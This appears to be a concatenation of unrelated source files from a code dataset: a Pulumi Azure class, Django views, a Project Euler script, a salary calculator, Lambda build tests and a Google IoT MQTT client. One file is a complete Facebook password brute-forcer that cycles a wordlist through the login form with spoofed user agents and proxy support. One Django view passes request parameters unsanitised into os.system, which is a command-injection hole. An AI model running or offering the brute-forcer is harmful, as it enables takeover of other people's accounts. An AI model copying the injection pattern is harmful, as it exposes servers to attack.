tanzakudata = BackendApi.get_scoutevent_tanzakucastdata(ModelRequestMgr(), self.__player0.id, self.__scoutevent_util.eventmaster.id)
if tanzakudata.current_cast != self.__tanzakumaster.number:
raise AppTestError(u'現在の指名キャストが正しくない')
elif tanzakudata.get_tanzaku(self.__tanzakumaster.number) != 0:
raise AppTestError(u'短冊の残り枚数が正しくない')
def finish(self):
self.__scoutevent_util.set_scoutevent_close()
| [
"shangye@mail.com"
] | shangye@mail.com |
3a06b6dd1ebce702804e9865497efe32c035f0ef | 90419da201cd4948a27d3612f0b482c68026c96f | /sdk/python/pulumi_azure_nextgen/insights/latest/favorite.py | d55a6dac0ab47d25c6e220984056f3c50b84acf8 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | test-wiz-sec/pulumi-azure-nextgen | cd4bee5d70cb0d332c04f16bb54e17d016d2adaf | 20a695af0d020b34b0f1c336e1b69702755174cc | refs/heads/master | 2023-06-08T02:35:52.639773 | 2020-11-06T22:39:06 | 2020-11-06T22:39:06 | 312,993,761 | 0 | 0 | Apache-2.0 | 2023-06-02T06:47:28 | 2020-11-15T09:04:00 | null | UTF-8 | Python | false | false | 9,210 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = ['Favorite']
class Favorite(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
category: Optional[pulumi.Input[str]] = None,
config: Optional[pulumi.Input[str]] = None,
favorite_id: Optional[pulumi.Input[str]] = None,
favorite_type: Optional[pulumi.Input[str]] = None,
is_generated_from_template: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
resource_name_: Optional[pulumi.Input[str]] = None,
source_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[str]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Properties that define a favorite that is associated to an Application Insights component.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] category: Favorite category, as defined by the user at creation time.
:param pulumi.Input[str] config: Configuration of this particular favorite, which are driven by the Azure portal UX. Configuration data is a string containing valid JSON
:param pulumi.Input[str] favorite_id: The Id of a specific favorite defined in the Application Insights component
:param pulumi.Input[str] favorite_type: Enum indicating if this favorite definition is owned by a specific user or is shared between all users with access to the Application Insights component.
:param pulumi.Input[bool] is_generated_from_template: Flag denoting wether or not this favorite was generated from a template.
:param pulumi.Input[str] name: The user-defined name of the favorite.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] resource_name_: The name of the Application Insights component resource.
:param pulumi.Input[str] source_type: The source of the favorite definition.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A list of 0 or more tags that are associated with this favorite definition
:param pulumi.Input[str] version: This instance's version of the data model. This can change as new features are added that can be marked favorite. Current examples include MetricsExplorer (ME) and Search.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['category'] = category
__props__['config'] = config
if favorite_id is None:
raise TypeError("Missing required property 'favorite_id'")
__props__['favorite_id'] = favorite_id
__props__['favorite_type'] = favorite_type
__props__['is_generated_from_template'] = is_generated_from_template
__props__['name'] = name
if resource_group_name is None:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
if resource_name_ is None:
raise TypeError("Missing required property 'resource_name_'")
__props__['resource_name'] = resource_name_
__props__['source_type'] = source_type
__props__['tags'] = tags
__props__['version'] = version
__props__['time_modified'] = None
__props__['user_id'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:insights/v20150501:Favorite")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(Favorite, __self__).__init__(
'azure-nextgen:insights/latest:Favorite',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'Favorite':
"""
Get an existing Favorite resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return Favorite(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def category(self) -> pulumi.Output[Optional[str]]:
"""
Favorite category, as defined by the user at creation time.
"""
return pulumi.get(self, "category")
@property
@pulumi.getter
def config(self) -> pulumi.Output[Optional[str]]:
"""
Configuration of this particular favorite, which are driven by the Azure portal UX. Configuration data is a string containing valid JSON
"""
return pulumi.get(self, "config")
@property
@pulumi.getter(name="favoriteId")
def favorite_id(self) -> pulumi.Output[str]:
"""
Internally assigned unique id of the favorite definition.
"""
return pulumi.get(self, "favorite_id")
@property
@pulumi.getter(name="favoriteType")
def favorite_type(self) -> pulumi.Output[Optional[str]]:
"""
Enum indicating if this favorite definition is owned by a specific user or is shared between all users with access to the Application Insights component.
"""
return pulumi.get(self, "favorite_type")
@property
@pulumi.getter(name="isGeneratedFromTemplate")
def is_generated_from_template(self) -> pulumi.Output[Optional[bool]]:
"""
Flag denoting wether or not this favorite was generated from a template.
"""
return pulumi.get(self, "is_generated_from_template")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The user-defined name of the favorite.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="sourceType")
def source_type(self) -> pulumi.Output[Optional[str]]:
"""
The source of the favorite definition.
"""
return pulumi.get(self, "source_type")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of 0 or more tags that are associated with this favorite definition
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="timeModified")
def time_modified(self) -> pulumi.Output[str]:
"""
Date and time in UTC of the last modification that was made to this favorite definition.
"""
return pulumi.get(self, "time_modified")
@property
@pulumi.getter(name="userId")
def user_id(self) -> pulumi.Output[str]:
"""
Unique user id of the specific user that owns this favorite.
"""
return pulumi.get(self, "user_id")
@property
@pulumi.getter
def version(self) -> pulumi.Output[Optional[str]]:
"""
This instance's version of the data model. This can change as new features are added that can be marked favorite. Current examples include MetricsExplorer (ME) and Search.
"""
return pulumi.get(self, "version")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| [
"public@paulstack.co.uk"
] | public@paulstack.co.uk |
9d4e46266c0eeba54c377658d47edf697b79c0f3 | 72c3731ba71ed8b0d18fda32feb33f4344542608 | /api/babelconverter/views.py | 18a831d9473e9d12d94db80c6e357f1c02f08e07 | [] | no_license | AugustoCPinheiro/OpenBabelConverter | 2603b3f07a489a29c8938ee9e3cf99d9f7c78b3e | 152eabd75639f1c9c4560ea8d995b8b0435b573d | refs/heads/master | 2022-12-10T05:09:59.507063 | 2019-10-17T22:23:13 | 2019-10-17T22:23:13 | 196,431,031 | 1 | 0 | null | 2022-12-08T06:41:50 | 2019-07-11T16:35:58 | Python | UTF-8 | Python | false | false | 2,214 | py | from django.http import HttpResponseRedirect
from django.http import HttpResponse
import os
import datetime
from django.views.decorators.csrf import csrf_exempt
import json
from django.core import serializers
from babelconverter import utils
import requests
from PIL import Image
import numpy as np
@csrf_exempt
def compositeByName(request):
loaded = json.loads(request.body)
r = requests.request('GET','https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/name/'+ loaded["compound-name"] +'/JSON')
if(r.status_code == 200):
return HttpResponse(r, content_type='application/json')
return HttpResponse('Not working')
@csrf_exempt
def compositeImageByName(request):
loaded = json.loads(request.body)
compound_name = loaded['compound-name']
print(compound_name)
r = requests.request('GET','https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/name/'+ compound_name +'/JSON')
smiles = r.json()['PC_Compounds'][0]['props'][18]['value']['sval']
print(smiles)
file_path = "../temp/"
command = utils.convert_to_command(smiles, file_path, compound_name)
os.system(command)
if(r.status_code == 200):
return HttpResponse(file_path + compound_name +".svg", content_type="image/svg+xml")
return HttpResponse('Not working')
@csrf_exempt
def convert(request):
smiles = request.GET.get('smiles', '')
size = request.GET.get('size', '300')
background = request.GET.get('background', '000000')
composite_name = datetime.datetime.now().__str__() + "-composite"
file_path = "../temp/"
file_name = "composite"
rgb = tuple(int(background[i:i+2], 16) for i in (0, 2, 4))
command = utils.convert_to_command(smiles, file_path, file_name)
command = command + " -xp " + size
print(command)
os.system(command)
im = Image.open(file_path + file_name +".png")
data = np.array(im)
red, green, blue = data.T
white_areas = (red == 255) & (blue == 255) & (green == 255)
print(data)
data[0:][white_areas.T] = (rgb[0], rgb[1], rgb[2])
print(data)
im2 = Image.fromarray(data)
im2.save(file_path + file_name + '.png', "PNG")
image_data = open(file_path + file_name +".png", "rb").read()
return HttpResponse(image_data, content_type="image/png")
| [
"augustocepinheiro@gmail.com"
] | augustocepinheiro@gmail.com |
402855c5f07be19f37f9e64bb5cec230be3bda3e | 7bb2b8a71e74e4a63a1c365ae63bc296b8daf502 | /project-euler/src/053.py | 7856ea133771b6eef557dd2be25ecd6233d5458c | [] | no_license | mseravalli/prog-pract | 3e038df2e59f8e377f9f2e4180162ed4c01cacce | 58ff9ced25b877685768003c36a0c29ad2387fe1 | refs/heads/master | 2021-01-17T09:33:24.524944 | 2013-09-16T11:42:53 | 2013-09-16T11:42:53 | 32,332,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 215 | py | #!/usr/bin/python
import math
lim = 100
count = 0
for i in range(1, lim+1):
for j in range(i+1):
c = math.factorial(i)/(math.factorial(j)*math.factorial(i-j))
if c > 1000000:
count += 1
print count
| [
"marco.seravalli@gmail.com"
] | marco.seravalli@gmail.com |
cfe4bf82f8699e90bd73b3ef7cb353fc5e90bcac | ce3b5719811cbd530318590dda524ffeb7dc0c97 | /lista-de-exercicio-2/Questao12.py | 4a030ec83f3459f42bb68d9c728c086554b1f80d | [] | no_license | warleyken42/estrutura-de-dados | dbc6825d5b7a555dbed636011392ac91280ab6f5 | a039da5ab66f0e3bff779543a296a4e561ce0a51 | refs/heads/master | 2020-08-10T20:08:29.227728 | 2019-11-28T22:59:45 | 2019-11-28T22:59:45 | 160,401,593 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,123 | py | horas = int(input("Digite quanto ganha por hora: "))
quantidade_horas = int(input("Digite o numero de horas trabalhadas:"))
salario_bruto = quantidade_horas * horas
cinco_porcento = (5 / 100.0) * salario_bruto
dez_porcento = (10/ 100.0) * salario_bruto
onze_porcento = (11 / 100.0) * salario_bruto
vinte_porcento = (20 / 100.0) * salario_bruto
if salario_bruto <= 900:
print("Seu salario bruto : R$ {}".format(salario_bruto))
print("(-) IR (5%) : R$ {}".format(0))
print("(-) INSS (10%) : R$ {}".format(0))
print("FGTS (11%) : R$ {}".format(0))
print("Salário Liquido : R$ {}".format(salario_bruto))
elif salario_bruto >= 900 and salario_bruto <= 1500:
print("Seu salario bruto : R$ {}".format(salario_bruto))
print("(-) IR (5%) : R$ {}".format(cinco_porcento))
print("(-) INSS (10%) : R$ {}".format(dez_porcento))
print("FGTS (11%) : R$ {}".format(onze_porcento))
print("Total de descontos : R$ {}".format(cinco_porcento + dez_porcento))
print("Salário Liquido : R$ {}".format(salario_bruto - (cinco_porcento + dez_porcento)))
elif salario_bruto > 1500 and salario_brunto <= 2500:
print("Seu salario bruto : R$ {}".format(salario_bruto))
print("(-) IR (5%) : R$ {}".format(cinco_porcento))
print("(-) INSS (10%) : R$ {}".format(dez_porcento))
print("FGTS (11%) : R$ {}".format(onze_porcento))
print("Total de descontos : R$ {}".format(dez_porcento + dez_porcento))
print("Salário Liquido : R$ {}".format(salario_bruto - (dez_porcento + dez_porcento)))
elif salario_bruto > 2500:
print("Seu salario bruto : R$ {}".format(salario_bruto))
print("(-) IR (5%) : R$ {}".format(cinco_porcento))
print("(-) INSS (10%) : R$ {}".format(dez_porcento))
print("FGTS (11%) : R$ {}".format(onze_porcento))
print("Total de descontos : R$ {}".format(vinte_porcento + dez_porcento))
print("Salário Liquido : R$ {}".format(salario_bruto - (vinte_porcento + dez_porcento))) | [
"warley-ft@hotmail.com"
] | warley-ft@hotmail.com |
366adcdd2354b540a6cb703281de83a7f577216c | b1c07da68cfaa7d770e1ac0da1f946aca0871d69 | /facebook.py | 2d46804b2548aff63ee9dc3c1fc81cfe56b9f22d | [] | no_license | bugresearcher/Python-Tool | 191fc9e10f4d61a68db3b705dab838913983c31a | 0ca43f407c0229a437179ddd0e67e87234692970 | refs/heads/master | 2020-03-21T21:35:00.055512 | 2018-06-28T21:52:57 | 2018-06-28T21:52:57 | 139,071,762 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,982 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
__programmer__ = "Cyb3rK!ng"
__version__ = "2.1"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ ___| |__ ___ ___ | | __
| _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
| || (_| | (_| __/ |_) | (_) | (_) | <
|_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (__programmer__, __version__)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy
| Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help
Example : %s -u brad@hackme.com -w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | bugresearcher.noreply@github.com |
164f4ccbd1e5d977f9155e7c47cf8cebf91a3f3f | 9e92a66f1e2aa8b910673ea5839c406055114898 | /posts/migrations/0003_auto_20200520_1420.py | e2162ee27b27586871860c381626eedf490812ad | [] | no_license | alexlega/hw05_final | f9055cf7b6e7f00d9775d187d6499cbd8f80a2fc | 8557b7437e8ea5b240342ed1963ccfada2b87572 | refs/heads/master | 2023-06-03T23:24:45.287006 | 2021-06-13T09:48:58 | 2021-06-13T09:48:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 558 | py | # Generated by Django 2.2 on 2020-05-20 14:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0002_auto_20200518_1808'),
]
operations = [
migrations.AlterField(
model_name='group',
name='title',
field=models.CharField(max_length=200, verbose_name='Group'),
),
migrations.AlterField(
model_name='post',
name='text',
field=models.TextField(verbose_name='Text'),
),
]
| [
"sorochinsky.alex@gmail.com"
] | sorochinsky.alex@gmail.com |
f476a782bb7c0fa3988eeb584d7ee79e3ad18377 | bb09de22997670f0f3c3c360fa20d6a5394b7aa0 | /tests/lambda_functions/build_test.py | a4a36f093d8703d3978fe432b6c0c83f22f96ae6 | [
"Apache-2.0"
] | permissive | securitywarrior/binaryalert | 4bda9de405f641eb7cdb48d83c42e5ddbd635032 | 548fbfb9fd913a74381ff58afed46a60f36b5312 | refs/heads/master | 2021-01-21T11:33:08.356220 | 2017-08-30T22:09:52 | 2017-08-30T22:09:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,840 | py | """Test lambda_functions/build.py."""
import os
import tempfile
import unittest
from unittest import mock
import zipfile
from lambda_functions import build
@mock.patch.object(build, 'print')
class BuildTest(unittest.TestCase):
"""Test top-level build command."""
# pylint: disable=protected-access
def setUp(self):
"""Find temp directory in which to build packages."""
self.maxDiff = None # pylint: disable=invalid-name
self._tempdir = tempfile.gettempdir()
def _verify_filenames(self, archive_path, expected_filenames):
"""Verify the set of filenames in the zip archive matches the expected list."""
with zipfile.ZipFile(archive_path, 'r') as archive:
filenames = set(zip_info.filename for zip_info in archive.filelist)
self.assertEqual(expected_filenames, filenames)
def test_build_analyzer(self, mock_print):
"""Verify that a valid zipfile is generated for analyzer Lambda function."""
build._build_analyzer(self._tempdir)
self._verify_filenames(
os.path.join(self._tempdir, build.ANALYZE_ZIPFILE + '.zip'),
{
'yara_python-3.6.3.egg-info/',
'__init__.py',
'analyzer_aws_lib.py',
'binary_info.py',
'compiled_yara_rules.bin',
'file_hash.py',
'libpython3.5m.so.1.0',
'main.py',
'yara.so',
'yara_analyzer.py',
'yara_python-3.6.3.egg-info/dependency_links.txt',
'yara_python-3.6.3.egg-info/installed-files.txt',
'yara_python-3.6.3.egg-info/not-zip-safe',
'yara_python-3.6.3.egg-info/PKG-INFO',
'yara_python-3.6.3.egg-info/SOURCES.txt',
'yara_python-3.6.3.egg-info/top_level.txt'
}
)
mock_print.assert_called_once()
def test_build_batcher(self, mock_print):
"""Verify that a valid zipfile is generated for the batcher Lambda function."""
build._build_batcher(self._tempdir)
self._verify_filenames(
os.path.join(self._tempdir, build.BATCH_ZIPFILE + '.zip'), {'main.py'}
)
mock_print.assert_called_once()
def test_build_dispatcher(self, mock_print):
"""Verify that a valid zipfile is generated for the dispatcher Lambda function."""
build._build_dispatcher(self._tempdir)
self._verify_filenames(
os.path.join(self._tempdir, build.DISPATCH_ZIPFILE + '.zip'), {'main.py'}
)
mock_print.assert_called_once()
def test_build_all(self, mock_print):
"""Verify that the top-level build function executes without error."""
build.build(self._tempdir)
self.assertEqual(3, mock_print.call_count)
| [
"noreply@github.com"
] | securitywarrior.noreply@github.com |
5119426e1ed1aa1986eb3fece023820bdd09b97c | 9943e71076dc24be03b6d3576949476e2835156f | /mqtt_google.py | 77780c169f38a942d2ae66ea9fdfa82a3d4d87bd | [] | no_license | bransyah/Project_2 | d434bd1d57152f79ef0a21b8343f3560c47d829e | 9e263ac3a8149c76ff17a8bbe8049147b8e85401 | refs/heads/main | 2023-02-08T14:01:52.079511 | 2021-01-01T16:58:27 | 2021-01-01T16:58:27 | 322,575,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,400 | py | import datetime
import jwt
import ssl
import time
import paho.mqtt.client as mqtt
#Project ID of IoT Core
PROJECT_ID = "hsc2020-04"
# Location of server
REGION_ID = "asia-east1"
# ID of IoT registry
REGISTRY_ID = "fog"
# ID of the Gateway
GATEWAY_ID = "fog_rpi"
# ID of the Device
DEVICE_ID = "esp32_fog"
# Type of encryption being used
ENCRYPTION_ALGORITHM = "RS256"
# Private Key fike
#PRIVATE_KEY_FILE = "/Users/rahmad/Workspace/Hardware-Software-MQTT/rsa_private.pem"
PRIVATE_KEY_FILE = "/home/pi/rsa_private.pem"
# Certificate for Google SSL
#CA_CERTS = "/Users/rahmad/Workspace/Hardware-Software-MQTT/roots.pem"
CA_CERTS = "/home/pi/roots.pem"
# Lifetime of credentials to send message
JWT_EXPIRES_IN_MINUTES = 10
# Google IoT MQTT Broker
MQTT_BRIDGE_HOSTNAME = "mqtt.googleapis.com"
MQTT_BRIDGE_PORT = 8883
# Timeout to wait for connection
WAIT_CONNECTION_TIMEOUT = 5
# Connection status
connected = False
def create_jwt():
""" Create JWT Token """
iat = datetime.datetime.utcnow()
exp = iat + datetime.timedelta(minutes=JWT_EXPIRES_IN_MINUTES)
print("iat", iat)
print("exp", exp)
token = {
# The time the token was issued.
'iat': iat,
# Token expiration time.
'exp': exp,
# The audience field should always be set to the GCP project id.
'aud': PROJECT_ID
}
print("token", token)
# Read the private key file.
pem_file = open(PRIVATE_KEY_FILE, 'r')
private_key = pem_file.read()
print(f"Creating JWT using '{ENCRYPTION_ALGORITHM}' from private key file '{PRIVATE_KEY_FILE}'.")
#jwt_token = jwt.encode(token, private_key, algorithm=ENCRYPTION_ALGORITHM).decode('ascii')
jwt_token = jwt.encode(token, private_key, algorithm=ENCRYPTION_ALGORITHM)
print()
print("JWT TOKEN")
print(jwt_token)
print()
return jwt_token
def error_str(rc):
"""Convert a Paho error to a human readable string."""
return f"{rc}: {mqtt.error_string(rc)}"
def on_connect(unused_client, unused_userdata, unused_flags, rc):
"""Callback for when a device connects."""
#print('on_connect: ', mqtt.connack_string(rc))
print(f"on_connect: {error_str(rc)} ({mqtt.connack_string(rc)})")
print()
global connected
connected = True
def on_disconnect(unused_client, unused_userdata, rc):
"""Paho callback for when a device disconnects."""
print(f"on_disconnect: {error_str(rc)}")
print()
global connected
connected = False
def on_publish(client, userdata, mid):
"""Paho callback when a message is sent to the broker."""
print('on_publish')
print(" userdata:" + str(userdata))
print(" mid:" + str(mid))
print()
def on_subscribe(client, userdata, mid, granted_qos):
print("on_subscribe")
print()
def on_unsubscribe(client, userdata, mid):
print("on_unsubscribe")
print()
def on_message(client, userdata, message):
"""Callback when the device receives a message on a subscription."""
payload = str(message.payload.decode('utf-8'))
print(f"Received message \'{payload}\' on topic \'{message.topic}\' with Qos {str(message.qos)}")
print()
def wait_for_connection(timeout):
"""Wait for the device to become connected."""
global connected
total_time = 0
while not connected and total_time < timeout:
time.sleep(1)
total_time += 1
if not connected:
raise RuntimeError('Could not connect to MQTT bridge.')
def get_client():
# create client Object
client_id = f"projects/{PROJECT_ID}/locations/{REGION_ID}/registries/{REGISTRY_ID}/devices/{GATEWAY_ID}"
client = mqtt.Client(client_id=client_id)
# With Google Cloud IoT Core, the username field is ignored, and the
# password field is used to transmit a JWT to authorize the device.
client.username_pw_set(username='unused',
password=create_jwt())
# Use SSL/TLS support
client.tls_set(ca_certs=CA_CERTS, tls_version=ssl.PROTOCOL_TLSv1_2)
# Register message callbacks. https://eclipse.org/paho/clients/python/docs/
# describes additional callbacks that Paho supports. In this example, the
# callbacks just print to standard out.
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.on_publish = on_publish
client.on_subscribe = on_subscribe
client.on_unsubscribe = on_unsubscribe
client.on_message = on_message
# Connect to the Google MQTT broker.
client.connect(MQTT_BRIDGE_HOSTNAME, MQTT_BRIDGE_PORT)
client.loop_start()
wait_for_connection(WAIT_CONNECTION_TIMEOUT)
return client
def wait_for_disconnection(timeout):
"""Wait for the device to become connected."""
global connected
total_time = 0
while connected and total_time < timeout:
time.sleep(1)
total_time += 1
if connected:
raise RuntimeError('Could not disconnect to MQTT bridge.')
def release_client(client):
""""Disconnect device from broker."""
client.disconnect()
client.loop_stop()
wait_for_disconnection(WAIT_CONNECTION_TIMEOUT)
def attach_device(client):
"""Notify broker a new device has been attached."""
print()
print("Attach Device")
print("================================================")
print()
# Publish to the topic to attach device
mqtt_topic = f"/devices/{DEVICE_ID}/attach"
# Create payload
payload = '{"authorization" : ""}'
# Publish something
print("Attaching")
print(" Topic: " + mqtt_topic)
print(" Payload: " + payload)
print()
# Publish "payload" to the MQTT topic. qos=1 means at least once
# delivery. Cloud IoT Core also supports qos=0 for at most once
# delivery.
